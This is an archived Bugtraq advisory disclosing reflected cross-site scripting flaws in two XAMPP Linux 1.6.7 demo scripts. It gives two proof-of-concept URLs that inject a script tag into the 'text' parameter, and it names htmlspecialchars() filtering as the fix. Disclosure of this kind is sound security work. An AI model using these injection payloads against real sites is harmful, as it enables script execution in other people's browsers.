Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities
From: irancrash@xxxxxxxxx
Date: Mon, 4 Aug 2008 08:13:04 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

----------------------------------------------------------------

Program : Xampp Linux 1.6.7

Type : Multiple Cross Site Scripting Vulnerabilities

Alert : Medium

----------------------------------------------------------------

Download From : 
http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz

----------------------------------------------------------------

Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Cross Site Scripting Vulnerabilities :

Vulnerability work when register_globals set as on .

http://Example.com/xampp/iart.php?text=";>><<>>"''<script>alert(document.alert)</script>

http://Example.com/xampp/ming.php?text=";>><<>>"''<script>alert(document.alert)</script>

Solution : Remove xampp folder or filter text variable with htmlspecialchars() 
function ....

----------------------------------------------------------------

                        Tnx : God

                     HTTP://IRCRASH.COM

----------------------------------------------------------------

Prev by Date: CORE-2008-0716 - Sun xVM VirtualBox Privilege Escalation Vulnerability
Next by Date: 8e6 Technologies R3000 Internet Filter Bypass with Host Decoy
Previous by thread: CORE-2008-0716 - Sun xVM VirtualBox Privilege Escalation Vulnerability
Next by thread: 8e6 Technologies R3000 Internet Filter Bypass with Host Decoy
Index(es):
- Date
- Thread